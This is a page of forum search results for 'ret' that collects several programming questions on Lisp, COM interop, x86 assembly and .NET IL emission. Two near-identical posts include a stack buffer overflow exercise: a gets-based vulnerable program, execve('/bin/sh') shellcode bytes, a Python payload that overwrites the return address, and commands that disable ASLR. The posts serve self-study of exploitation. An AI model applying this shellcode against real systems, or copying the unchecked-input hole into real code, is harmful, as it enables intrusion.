Search Results

Search found 509 results on 21 pages for 'ret'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 18/21 | < Previous Page | 14 15 16 17 18 19 20 21  | Next Page >

  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328 Debugging with gdb: $ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb) $ gdb buffer (gdb) run < exploit.txt Starting program: /home/henning/bo/buffer < exploit.txt Stackpointer 0x7fffffffe308 Jump to 0x7fffffffe308 process 4185 is executing new program: /bin/dash Program exited normally.

    Read the article

  • Land of Lisp example question

    - by cwallenpoole
    I've read a lot of good things about Land of Lisp so I thought that I might go through it to see what there was to see. (defun tweak-text (lst caps lit) (when lst (let ((item (car lst)) (rest (cdr lst))) (cond ; If item = space, then call recursively starting with ret ; Then, prepend the space on to the result. ((eq item #\space) (cons item (tweak-text rest caps lit))) ; if the item is an exclamation point. Make sure that the ; next non-space is capitalized. ((member item '(#\! #\? #\.)) (cons item (tweak-text rest t lit))) ; if item = " then toggle whether we are in literal mode ((eq item #\") (tweak-text rest caps (not lit))) ; if literal mode, just add the item as is and continue (lit (cons item (tweak-text rest nil lit))) ; if either caps or literal mode = true capitalize it? ((or caps lit) (cons (char-upcase item) (tweak-text rest nil lit))) ; otherwise lower-case it. (t (cons (char-downcase item) (tweak-text rest nil nil))))))) (the comments are mine) (FYI -- the method signature is (list-of-symbols bool-whether-to-caps bool-whether-to-treat-literally) but the author shortened these to (lst caps lit).) But anyway, here's the question: This has (cond... (lit ...) ((or caps lit) ...)) in it. My understanding is that this would translate to if(lit){ ... } else if(caps || lit){...} in a C style syntax. Isn't the or statement redundant then? Is there ever a condition where the (or caps lit) condition will be called if caps is nil?

    Read the article

  • Setting System.Drawing.Color through .NET COM Interop

    - by Maxim
    I am trying to use Aspose.Words library through COM Interop. There is one critical problem: I cannot set color. It is supposed to work by assigning to DocumentBuilder.Font.Color, but when I try to do it I get OLE error 0x80131509. My problem is pretty much like this one: http://bit.ly/cuvWfc update: Code Sample: from win32com.client import Dispatch Doc = Dispatch("Aspose.Words.Document") Builder = Dispatch("Aspose.Words.DocumentBuilder") Builder.Document = Doc print Builder.Font.Size print Builder.Font.Color Result: 12.0 Traceback (most recent call last): File "aaa.py", line 6, in <module> print Builder.Font.Color File "D:\Python26\lib\site-packages\win32com\client\dynamic.py", line 501, in __getattr__ ret = self._oleobj_.Invoke(retEntry.dispid,0,invoke_type,1) pywintypes.com_error: (-2146233079, 'OLE error 0x80131509', None, None) Using something like Font.Color = 0xff0000 fails with same error message While this code works ok: using Aspose.Words; namespace ConsoleApplication1 { class Program { static void Main(string[] args) { Document doc = new Document(); DocumentBuilder builder = new DocumentBuilder(doc); builder.Font.Color = System.Drawing.Color.Blue; builder.Write("aaa"); doc.Save("c:\\1.doc"); } } } So it looks like COM Interop problem.

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • nasm/yasm arguments, linkage to C++

    - by arionik
    Hello everybody, I've got a question concerning nasm and its linkage to C++. I declare a litte test function as extern "C" void __cdecl myTest( byte i1, byte i2, int stride, int *width ); and I call it like this: byte i1 = 1, i2 = 2; int stride = 3, width = 4; myTest( i1, i2, stride, &width ); the method only serves to debug assembly and have a look at how the stack pointer is used to get the arguments. beyond that, the pointer arguments value shall be set to 7, to figure out how that works. This is implemented like this: global _myTest _myTest: mov eax, [esp+4] ; 1 mov ebx, [esp+8] ; 2 mov ecx, dword [esp+16] ; width mov edx, dword [esp+12] ; stride mov eax, dword [esp+16] mov dword [eax], 7 ret and compiled via yasm -f win32 -g cv8 -m x86 -o "$(IntDir)\$(InputName).obj" "$(InputPath)" , then linked to the c++ app. In debug mode, everything works fine. the function is called a couple of times and works as expected, whereas in release mode the function works once, but subsequent programm operations fail. It seems to me that something's wrong with stack/frame pointers, near/far, but I'm quite new to this subject and need a little help. thanks in advance! a.

    Read the article

  • Generate exe in .Net

    - by rwallace
    In .Net, you can generate byte code in memory, and presumably save the resulting program to a .exe file. To do the first step, I have the following test code adapted from http://www.code-magazine.com/Article.aspx?quickid=0301051 var name = new AssemblyName(); name.Name = "MyAssembly"; var ad = Thread.GetDomain(); var ab = ad.DefineDynamicAssembly(name, AssemblyBuilderAccess.Run); var mb = ab.DefineDynamicModule("MyModule"); var theClass = mb.DefineType("MathOps", TypeAttributes.Public); var retType = typeof(System.Int32); var parms = new Type[2]; parms[0] = typeof(System.Int32); parms[1] = typeof(System.Int32); var meb = theClass.DefineMethod("ReturnSum", MethodAttributes.Public, retType, parms); var gen = meb.GetILGenerator(); gen.Emit(OpCodes.Ldarg_1); gen.Emit(OpCodes.Ldarg_2); gen.Emit(OpCodes.Add_Ovf); gen.Emit(OpCodes.Stloc_0); gen.Emit(OpCodes.Br_S); gen.Emit(OpCodes.Ldloc_0); gen.Emit(OpCodes.Ret); theClass.CreateType(); How do you do the second step, and save the result to a .exe?

    Read the article

  • Attempting to convert an if statement to assembly

    - by Malfist
    What am I doing wrong? This is the assmebly I've written: char encode(char plain){ __asm{ mov al, plain ;check for y or z status cmp al, 'y' je YorZ cmp al, 'z' je YorZ cmp al, 'Y' je YorZ cmp al, 'Z' je YorZ ;check to make sure it is in the alphabet now mov cl, al sub cl, 'A' cmp cl, 24 jl Other sub cl, '6' ;there are six characters between 'Z' and 'a' cmp cl, 24 jl Other jmp done ;means it is not in the alphabet YorZ: sub al, 24 jmp done Other: add al, 2 jmp done done: leave ret } } and this is the C code it's supposed to replace, but doesn't char encode(char plain){ char code; if((plain>='a' && plain<='x') || (plain>='A' && plain <='X')){ code = plain+2; }else if(plain == 'y' || plain=='z' || plain=='Y' || plain == 'y'){ code = plain - 24; }else{ code = plain; } return code; } It seems to convert every character that isn't an y,z,Y,Z into a plus 2 equivalent instead of just A-Xa-x. Any ideas why?

    Read the article

  • Problems with generation of dynamic code

    - by user308344
    This code gif an exception: Invocation exception, please help, I don't know what happen, I think is some thing with the Add because he work when I push onto the stack intergers, and when i push lvalue It's didn't work, thanks static void Main(string[] args) { AppDomain dominioAplicacion = System.Threading.Thread.GetDomain(); AssemblyName nombre_Del_Ensamblado = new AssemblyName("ASS"); AssemblyBuilder ensambladoBld = dominioAplicacion.DefineDynamicAssembly(nombre_Del_Ensamblado, AssemblyBuilderAccess.RunAndSave); ModuleBuilder moduloBld = ensambladoBld.DefineDynamicModule("<MOD"); TypeBuilder claseContenedoraBld = moduloBld.DefineType("claseContenedora"); MethodBuilder mainBld = claseContenedoraBld.DefineMethod("main", MethodAttributes.Public | MethodAttributes.Static, typeof(void), Type.EmptyTypes); ILGenerator il = mainBld.GetILGenerator(); FieldBuilder campoBld = claseContenedoraBld.DefineField("x", typeof(int), FieldAttributes.Public | FieldAttributes.Static); il.Emit(OpCodes.Ldc_I4, 2); il.Emit(OpCodes.Stsfld, campoBld); FieldBuilder campoBld1 = claseContenedoraBld.DefineField("x1", typeof(int), FieldAttributes.Public | FieldAttributes.Static); il.Emit(OpCodes.Ldc_I4, 2); il.Emit(OpCodes.Stsfld, campoBld1); il.Emit(OpCodes.Ldftn, campoBld); //il.Emit(OpCodes.Unbox, typeof(int)); //il.Emit(OpCodes.Stloc_0); il.Emit(OpCodes.Ldloc_0); il.Emit(OpCodes.Ldftn, campoBld1); //il.Emit(OpCodes.Unbox, typeof(int)); il.Emit(OpCodes.Stloc_1); il.Emit(OpCodes.Ldloc_1); //il.Emit(OpCodes.Box, typeof(int)); //il.Emit(OpCodes.Ldftn, campoBld1); //il.Emit(OpCodes.Unbox, typeof(int)); il.Emit(OpCodes.Add); il.Emit(OpCodes.Pop); //il.Emit(OpCodes.Stsfld, campoBld1); il.Emit(OpCodes.Ret); Type t = claseContenedoraBld.CreateType(); object ptInstance = Activator.CreateInstance(t, new Type[] { }); t.InvokeMember("main", BindingFlags.InvokeMethod | BindingFlags.Static | BindingFlags.Public, null, ptInstance, new object[0]); var x = t.GetField("x"); }

    Read the article

  • setcontext and makecontext to call a generic function pointer

    - by Simone Margaritelli
    In another question i had the problem to port the code unsigned long stack[] = { 1, 23, 33, 43 }; /* save all the registers and the stack pointer */ unsigned long esp; asm __volatile__ ( "pusha" ); asm __volatile__ ( "mov %%esp, %0" :"=m" (esp)); for( i = 0; i < sizeof(stack); i++ ){ unsigned long val = stack[i]; asm __volatile__ ( "push %0" :: "m"(val) ); } unsigned long ret = function_pointer(); /* restore registers and stack pointer */ asm __volatile__ ( "mov %0, %%esp" :: "m" (esp) ); asm __volatile__ ( "popa" ); To a 64bit platform and many guys told me i should use the setcontext and makecontext functions set instead due to the calling conversion differences between 32 and 64 bits and portability issues. Well, i really can't find any useful documentation online, or at least not the kind i need to implement this, so, how can i use those functions to push arguments onto the stack, call a generic function pointer, obtain the return value and then restore the registers?

    Read the article

  • Mac OS X linker error in Qt; CoreGraphics & CGWindowListCreate

    - by Jake Petroules
    Here is my .mm file #include "windowmanagerutils.h" #ifdef Q_OS_MAC #import </System/Library/Frameworks/ApplicationServices.framework/Frameworks/CoreGraphics.framework/Headers/CGWindow.h> QRect WindowManagerUtils::getWindowRect(WId windowId) { CFArrayRef windows = CGWindowListCreate(kCGWindowListOptionOnScreenOnly, kCGNullWindowID); return QRect(); } QRect WindowManagerUtils::getClientRect(WId windowId) { return QRect(); } QString WindowManagerUtils::getWindowText(WId windowId) { return QString(); } WId WindowManagerUtils::rootWindow() { QApplication::desktop()->winId(); } WId WindowManagerUtils::windowFromPoint(const QPoint &p, WId parent, bool(*filterFunction)(WId)) { return NULL; } void WindowManagerUtils::setTopMostCarbon(const QWidget *const window, bool topMost) { if (!window) { return; } // Find a Cocoa equivalent for this Carbon function // [DllImport("/System/Library/Frameworks/Carbon.framework/Versions/Current/Carbon")] // OSStatus ret = HIViewSetZOrder(this->winId(), kHIViewZOrderAbove, NULL); } #endif The linker is telling me "_CGWindowListCreate" is undefined. What libraries must I link to? Apple's documentation is not very helpful on telling what to include or link to, like MSDN is. Also I couldn't just do #import <CGWindow.h>, I had to specify the absolute path to it... any way around that?

    Read the article

  • What Scheme Does Ghuloum Use?

    - by Don Wakefield
    I'm trying to work my way through Compilers: Backend to Frontend (and Back to Front Again) by Abdulaziz Ghuloum. It seems abbreviated from what one would expect in a full course/seminar, so I'm trying to fill in the pieces myself. For instance, I have tried to use his testing framework in the R5RS flavor of DrScheme, but it doesn't seem to like the macro stuff: src/ghuloum/tests/tests-driver.scm:6:4: read: illegal use of open square bracket I've read his intro paper on the course, An Incremental Approach to Compiler Construction, which gives a great overview of the techniques used, and mentions a couple of Schemes with features one might want to implement for 'extra credit', but he doesn't mention the Scheme he uses in the course. Update I'm still digging into the original question (investigating options such as Petit Scheme suggested by Eli below), but found an interesting link relating to Gholoum's work, so I am including it here. [Ikarus Scheme](http://en.wikipedia.org/wiki/Ikarus_(Scheme_implementation)) is the actual implementation of Ghuloum's ideas, and appears to have been part of his Ph.D. work. It's supposed to be one of the first implementations of R6RS. I'm trying to install Ikarus now, but the configure script doesn't want to recognize my system's install of libgmp.so, so my problems are still unresolved. Example The following example seems to work in PLT 2.4.2 running in DrEd using the Pretty Big (require lang/plt-pretty-big) (load "/Users/donaldwakefield/ghuloum/tests/tests-driver.scm") (load "/Users/donaldwakefield/ghuloum/tests/tests-1.1-req.scm") (define (emit-program x) (unless (integer? x) (error "---")) (emit " .text") (emit " .globl scheme_entry") (emit " .type scheme_entry, @function") (emit "scheme_entry:") (emit " movl $~s, %eax" x) (emit " ret") ) Attempting to replace the require directive with #lang scheme results in the error message foo.scm:7:3: expand: unbound identifier in module in: emit which appears to be due to a failure to load tests-driver.scm. Attempting to use #lang r6rs disables the REPL, which I'd really like to use, so I'm going to try to continue with Pretty Big. My thanks to Eli Barzilay for his patient help.

    Read the article

  • Alternative to sql NOT IN?

    - by Alex
    Hi, I am trying to make a materialized view in Oracle (I am a newbie, btw). For some reason, it doesn't like the presence of sub-query in it. I've been trying to use LEFT OUTER JOIN instead, but it's returning different data set now. Put simply, here's the code I'm trying to modify: SELECT * FROM table1 ros, table2 bal, table3 flx WHERE flx.name = 'XXX' AND flx.value = bal.value AND NVL (ros.ret, 'D') = Nvl (flx.attr16, 'D') AND ros.value = bal.segment3 AND ros.type IN ( 'AL', 'AS', 'PL' ) AND bal.period = 13 AND bal.code NOT IN (SELECT bal1.code FROM table2 bal1 WHERE bal1.value = flx.value AND bal1.segment3 = ros.value AND bal1.flag = bal.flag AND bal1.period = 12 AND bal1.year = bal.year) And here's one of my attempt: SELECT * FROM table1 ros, table2 bal, table3 flx LEFT OUTER JOIN table2 bal1 ON bal.code = bal1.code WHERE bal1.code is null AND bal1.segment3 = ros.value AND bal.segment3 = ros.value AND bal1.flag = bal.flag AND bal1.year = bal.year AND flx.name = 'XXX' AND flx.value = bal.value AND bal1.value = flx.value AND bal1.period_num = 12 AND NVL (ros.type, 'D') = NVL (flx.attr16, 'D') AND ros.value = bal.segment3 AND ros.type IN ( 'AL', 'AS', 'PL' ) AND bal.period = 13; This drives me nuts! Thanks in advance for the help :)

    Read the article

  • i386 assembly question: why do I need to meddle with the stack pointer?

    - by zneak
    Hello everyone, I decided it would be fun to learn x86 assembly during the summer break. So I started with a very simple hello world program, borrowing on free examples gcc -S could give me. I ended up with this: HELLO: .ascii "Hello, world!\12\0" .text .globl _main _main: pushl %ebp # 1. puts the base stack address on the stack movl %esp, %ebp # 2. puts the base stack address in the stack address register subl $20, %esp # 3. ??? pushl $HELLO # 4. push HELLO's address on the stack call _puts # 5. call puts xorl %eax, %eax # 6. zero %eax, probably not necessary since we didn't do anything with it leave # 7. clean up ret # 8. return # PROFIT! It compiles and even works! And I think I understand most of it. Though, magic happens at step 3. Would I remove this line, my program would die between the call to puts and the xor from a misaligned stack error. And would I change $20 to another value, it'd crash too. So I came to the conclusion that this value is very important. Problem is, I don't know what it does and why it's needed. Can anyone explain me? (I'm on Mac OS, would it ever matter.)

    Read the article

  • Insert MANY key value pairs fast into berkeley db with hash access

    - by Kungi
    Hi, i'm trying to build a hash with berkeley db, which shall contain many tuples (approx 18GB of key value pairs), but in all my tests the performance of the insert operations degrades drastically over time. I've written this script to test the performance: #include<iostream> #include<db_cxx.h> #include<ctime> #define MILLION 1000000 int main () { long long a = 0; long long b = 0; int passes = 0; int i = 0; u_int32_t flags = DB_CREATE; Db* dbp = new Db(NULL,0); dbp->set_cachesize( 0, 1024 * 1024 * 1024, 1 ); int ret = dbp->open( NULL, "test.db", NULL, DB_HASH, flags, 0); time_t time1 = time(NULL); while ( passes < 100 ) { while( i < MILLION ) { Dbt key( &a, sizeof(long long) ); Dbt data( &b, sizeof(long long) ); dbp->put( NULL, &key, &data, 0); a++; b++; i++; } DbEnv* dbep = dbp->get_env(); int tmp; dbep->memp_trickle( 50, &tmp ); i=0; passes++; std::cout << "Inserted one million --> pass: " << passes << " took: " << time(NULL) - time1 << "sec" << std::endl; time1 = time(NULL); } } Perhaps you can tell me why after some time the "put" operation takes increasingly longer and maybe how to fix this. Thanks for your help, Andreas

    Read the article

  • Exiting from the Middle of an Expression Without Using Exceptions

    - by Jon Purdy
    Is there a way to emulate the use of flow-control constructs in the middle of an expression? Is it possible, in a comma-delimited expression x, y, for y to cause a return? Edit: I'm working on a compiler for something rather similar to a functional language, and the target language is C++. Everything is an expression in the source language, and the sanest, simplest translation to the destination language leaves as many things expressions as possible. Basically, semicolons in the target language become C++ commas. In-language flow-control constructs have presented no problems thus far; it's only return. I just need a way to prematurely exit a comma-delimited expression, and I'd prefer not to use exceptions unless someone can show me that they don't have excessive overhead in this situation. The problem of course is that most flow-control constructs are not legal expressions in C++. The only solution I've found so far is something like this: try { return x(), // x(); (1 ? throw Return(0) : 0); // return 0; } catch (Return& ret) { return ref.value; } The return statement is always there (in the event that a Return construct is not reached), and as such the throw has to be wrapped in ?: to get the compiler to shut up about its void result being used in an expression. I would really like to avoid using exceptions for flow control, unless in this case it can be shown that no particular overhead is incurred; does throwing an exception cause unwinding or anything here? This code needs to run with reasonable efficiency. I just need a function-level equivalent of exit().

    Read the article

  • How can I know what this does?

    - by Dabor Troppe
    I got this piece of Assembly code extracted from some piece of software, but unfortunately I don't know anything of assembler and the bits I touched of Assembler was back in the Commodore Amiga with the 68000. Can anybody guide me on how I could understand this code without me needing to learn assembler from scratch, or just tell me what it does? Is there any kind of "Simulator" out there that I can run this on to see what it does? -[ObjSample Param1:andParam2:]: 00000c79 pushl %ebp 00000c7a movl %esp,%ebp 00000c7c subl $0x48,%esp 00000c7f movl %ebx,0xf4(%ebp) 00000c82 movl %esi,0xf8(%ebp) 00000c85 movl %edi,0xfc(%ebp) 00000c88 calll 0x00000c8d 00000c8d popl %ebx 00000c8e cmpb $-[ObjSample delegate],_bDoOnce.26952-0xc8d(%ebx) 00000c95 jel 0x00000d47 00000c9b movb $-[ObjSample delegate],_bDoOnce.26952-0xc8d(%ebx) 00000ca2 movl 0x7dc0-0xc8d(%ebx),%eax 00000ca8 movl %eax,0x04(%esp) 00000cac movl 0x7df4-0xc8d(%ebx),%eax 00000cb2 movl %eax,(%esp) 00000cb5 calll _objc_msgSend 00000cba movl 0x7dbc-0xc8d(%ebx),%edx 00000cc0 movl %edx,0x04(%esp) 00000cc4 movl %eax,(%esp) 00000cc7 calll _objc_msgSend 00000ccc movl %eax,0xe4(%ebp) 00000ccf movl 0x7db8-0xc8d(%ebx),%eax 00000cd5 movl %eax,0x04(%esp) 00000cd9 movl 0xe4(%ebp),%eax 00000cdc movl %eax,(%esp) 00000cdf calll _objc_msgSend 00000ce4 leal (%eax,%eax),%edi 00000ce7 movl %edi,(%esp) 00000cea calll _malloc 00000cef movl %eax,%esi 00000cf1 movl %edi,0x08(%esp) 00000cf5 movl $-[ObjSample delegate],0x04(%esp) 00000cfd movl %eax,(%esp) 00000d00 calll _memset 00000d05 movl $0x00000004,0x10(%esp) 00000d0d movl %edi,0x0c(%esp) 00000d11 movl %esi,0x08(%esp) 00000d15 movl 0x7db4-0xc8d(%ebx),%eax 00000d1b movl %eax,0x04(%esp) 00000d1f movl 0xe4(%ebp),%eax 00000d22 movl %eax,(%esp) 00000d25 calll _objc_msgSend 00000d2a xorl %edx,%edx 00000d2c movl %edi,%eax 00000d2e shrl $0x03,%eax 00000d31 jmp 0x00000d34 00000d33 incl %edx 00000d34 cmpl %edx,%eax 00000d36 ja 0x00000d33 00000d38 movl %esi,(%esp) 00000d3b calll _free 00000d40 movb $0x01,_isAuthenticated-0xc8d(%ebx) 00000d47 movzbl _isAuthenticated-0xc8d(%ebx),%eax 00000d4e movl 0xf4(%ebp),%ebx 00000d51 movl 0xf8(%ebp),%esi 00000d54 movl 0xfc(%ebp),%edi 00000d57 leave 00000d58 ret

    Read the article

  • x86_64 assembler: only one call per subroutine?

    - by zneak
    Hello everyone, I decided yesterday to start doing assembler. Most of it is okay (well, as okay as assembler can be), but I'm getting some problems with gas. It seems that I can call functions only once. After that, any subsequent call opcode with the same function name will fail. I must be doing something terribly wrong, though I can't see what. Take this small C function for instance: void path_free(path_t path) { if (path == NULL) return; free(((point_list_t*)path)->points); free(path); } I "translated" it to assembler like that: .globl _path_free _path_free: push rbp mov rbp, rsp cmp rdi, 0 jz byebye push rdi mov rdi, qword ptr [rdi] call _free pop rdi sub rsp, 8 call _free byebye: leave ret This triggers the following error for the second call _free: suffix or operands invalid for ``call''. And if I change it to something else, like free2, everything works (until link time, that is). Assembler code gcc -S gave me looks very similar to what I've done (except it's in AT&T syntax), so I'm kind of lost. I'm doing this on Mac OS X under the x86_64 architecture.

    Read the article

  • I'm about to learn x86 assembly on os x 10.6 let me know how compile..plz

    - by kevin choung
    hello~ I'm about to learn x86 assembly language on mac os x... I'm using as instruction to compile assembly file in commend window. but I have several errors.. and I don't know how I can get through.. here is the errors and my assembly code.. which is quite simple. **ung-mi-lims-macbook-pro:pa2 ungmi$ as swap.s swap.s:16:Unknown pseudo-op: .type swap.s:16:Rest of line ignored. 1st junk character valued 115 (s). swap.s:19:suffix or operands invalid for `push' swap.s:46:suffix or operands invalid for `pop' ung-mi-lims-macbook-pro:pa2 ungmi$** and the source is .text .align 4 .globl swap .type swap,@function swap: pushl %ebp movl %esp, %ebp movl %ebp, %esp popl %ebp ret and I searched some solution which is I have to put -arch i386 than **ung-mi-lims-macbook-pro:pa2 ungmi$ as -arch i386 swap.s swap.s:16:Unknown pseudo-op: .type swap.s:16:Rest of line ignored. 1st junk character valued 115 (s). ung-mi-lims-macbook-pro:pa2 ungmi$** could you help me out.. just let me know what I need to compile assembly file.. I have xcode already.. and I'd rather to do this with commend window..and vi editor.. I will be waiting for your answer... plz help me.

    Read the article

  • Compile Assembly Output generated by VC++?

    - by SDD
    I have a simple hello world C program and compile it with /FA. As a consequence, the compiler also generates the corresponding assembly listing. Now I want to use masm/link to assemble an executable from the generated .asm listing. The following command line yields 3 linker errors: \masm32\bin\ml /I"C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include" /c /coff asm_test.asm \masm32\bin\link /SUBSYSTEM:CONSOLE /LIBPATH:"C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\lib" asm_test.obj indicating that the C-runtime functions were not linked to the object files produced earlier: asm_test.obj : error LNK2001: unresolved external symbol @__security_check_cookie@4 asm_test.obj : error LNK2001: unresolved external symbol _printf LINK : error LNK2001: unresolved external symbol _wmainCRTStartup asm_test.exe : fatal error LNK1120: 3 unresolved externals Here is the generated assembly listing ; Listing generated by Microsoft (R) Optimizing Compiler Version 15.00.30729.01 TITLE c:\asm_test\asm_test\asm_test.cpp .686P .XMM include listing.inc .model flat INCLUDELIB OLDNAMES PUBLIC ??_C@_0O@OBPALAEI@hello?5world?$CB?6?$AA@ ; `string' EXTRN @__security_check_cookie@4:PROC EXTRN _printf:PROC ; COMDAT ??_C@_0O@OBPALAEI@hello?5world?$CB?6?$AA@ CONST SEGMENT ??_C@_0O@OBPALAEI@hello?5world?$CB?6?$AA@ DB 'hello world!', 0aH, 00H ; `string' CONST ENDS PUBLIC _wmain ; Function compile flags: /Ogtpy ; COMDAT _wmain _TEXT SEGMENT _argc$ = 8 ; size = 4 _argv$ = 12 ; size = 4 _wmain PROC ; COMDAT ; File c:\users\octon\desktop\asm_test\asm_test\asm_test.cpp ; Line 21 push OFFSET ??_C@_0O@OBPALAEI@hello?5world?$CB?6?$AA@ call _printf add esp, 4 ; Line 22 xor eax, eax ; Line 23 ret 0 _wmain ENDP _TEXT ENDS END I am using the latest masm32 version (6.14.8444).

    Read the article

  • help me improve my sse yuv to rgb ssse3 code

    - by David McPaul
    Hello, I am looking to optimise some sse code I wrote for converting yuv to rgb (both planar and packed yuv functions). i am using SSSE3 at the moment but if there are useful functions from later sse versions thats ok. I am mainly interested in how I would work out processor stalls and the like. Anyone know of any tools that do static analysis of sse code? ; ; Copyright (C) 2009-2010 David McPaul ; ; All rights reserved. Distributed under the terms of the MIT License. ; ; A rather unoptimised set of ssse3 yuv to rgb converters ; does 8 pixels per loop ; inputer: ; reads 128 bits of yuv 8 bit data and puts ; the y values converted to 16 bit in xmm0 ; the u values converted to 16 bit and duplicated into xmm1 ; the v values converted to 16 bit and duplicated into xmm2 ; conversion: ; does the yuv to rgb conversion using 16 bit integer and the ; results are placed into the following registers as 8 bit clamped values ; r values in xmm3 ; g values in xmm4 ; b values in xmm5 ; outputer: ; writes out the rgba pixels as 8 bit values with 0 for alpha ; xmm6 used for scratch ; xmm7 used for scratch %macro cglobal 1 global _%1 %define %1 _%1 align 16 %1: %endmacro ; conversion code %macro yuv2rgbsse2 0 ; u = u - 128 ; v = v - 128 ; r = y + v + v >> 2 + v >> 3 + v >> 5 ; g = y - (u >> 2 + u >> 4 + u >> 5) - (v >> 1 + v >> 3 + v >> 4 + v >> 5) ; b = y + u + u >> 1 + u >> 2 + u >> 6 ; subtract 16 from y movdqa xmm7, [Const16] ; loads a constant using data cache (slower on first fetch but then cached) psubsw xmm0,xmm7 ; y = y - 16 ; subtract 128 from u and v movdqa xmm7, [Const128] ; loads a constant using data cache (slower on first fetch but then cached) psubsw xmm1,xmm7 ; u = u - 128 psubsw xmm2,xmm7 ; v = v - 128 ; load r,b with y movdqa xmm3,xmm0 ; r = y pshufd xmm5,xmm0, 0xE4 ; b = y ; r = y + v + v >> 2 + v >> 3 + v >> 5 paddsw xmm3, xmm2 ; add v to r movdqa xmm7, xmm1 ; move u to scratch pshufd xmm6, xmm2, 0xE4 ; move v to scratch psraw xmm6,2 ; divide v by 4 paddsw xmm3, xmm6 ; and add to r psraw xmm6,1 ; divide v by 2 paddsw xmm3, xmm6 ; and add to r psraw xmm6,2 ; divide v by 4 paddsw xmm3, xmm6 ; and add to r ; b = y + u + u >> 1 + u >> 2 + u >> 6 paddsw xmm5, xmm1 ; add u to b psraw xmm7,1 ; divide u by 2 paddsw xmm5, xmm7 ; and add to b psraw xmm7,1 ; divide u by 2 paddsw xmm5, xmm7 ; and add to b psraw xmm7,4 ; divide u by 32 paddsw xmm5, xmm7 ; and add to b ; g = y - u >> 2 - u >> 4 - u >> 5 - v >> 1 - v >> 3 - v >> 4 - v >> 5 movdqa xmm7,xmm2 ; move v to scratch pshufd xmm6,xmm1, 0xE4 ; move u to scratch movdqa xmm4,xmm0 ; g = y psraw xmm6,2 ; divide u by 4 psubsw xmm4,xmm6 ; subtract from g psraw xmm6,2 ; divide u by 4 psubsw xmm4,xmm6 ; subtract from g psraw xmm6,1 ; divide u by 2 psubsw xmm4,xmm6 ; subtract from g psraw xmm7,1 ; divide v by 2 psubsw xmm4,xmm7 ; subtract from g psraw xmm7,2 ; divide v by 4 psubsw xmm4,xmm7 ; subtract from g psraw xmm7,1 ; divide v by 2 psubsw xmm4,xmm7 ; subtract from g psraw xmm7,1 ; divide v by 2 psubsw xmm4,xmm7 ; subtract from g %endmacro ; outputer %macro rgba32sse2output 0 ; clamp values pxor xmm7,xmm7 packuswb xmm3,xmm7 ; clamp to 0,255 and pack R to 8 bit per pixel packuswb xmm4,xmm7 ; clamp to 0,255 and pack G to 8 bit per pixel packuswb xmm5,xmm7 ; clamp to 0,255 and pack B to 8 bit per pixel ; convert to bgra32 packed punpcklbw xmm5,xmm4 ; bgbgbgbgbgbgbgbg movdqa xmm0, xmm5 ; save bg values punpcklbw xmm3,xmm7 ; r0r0r0r0r0r0r0r0 punpcklwd xmm5,xmm3 ; lower half bgr0bgr0bgr0bgr0 punpckhwd 